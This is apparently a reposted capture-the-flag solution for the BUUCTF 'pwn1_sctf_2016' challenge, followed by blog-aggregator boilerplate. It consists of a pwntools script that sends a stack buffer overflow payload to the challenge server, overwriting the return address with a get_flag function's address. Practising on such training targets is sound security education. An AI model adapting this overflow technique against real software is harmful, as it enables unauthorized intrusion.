from pwn import * sh=remote('pwn.buuoj.cn',20086) get_flag=0x08048F0D payload='I'*0x14+'a'*4+p32(get_flag) sh.sendline(payload) sh.interactive()
buuctf@pwn1_sctf_2016
猜你喜欢
转载自www.cnblogs.com/imiopr/p/12083637.html
今日推荐
周排行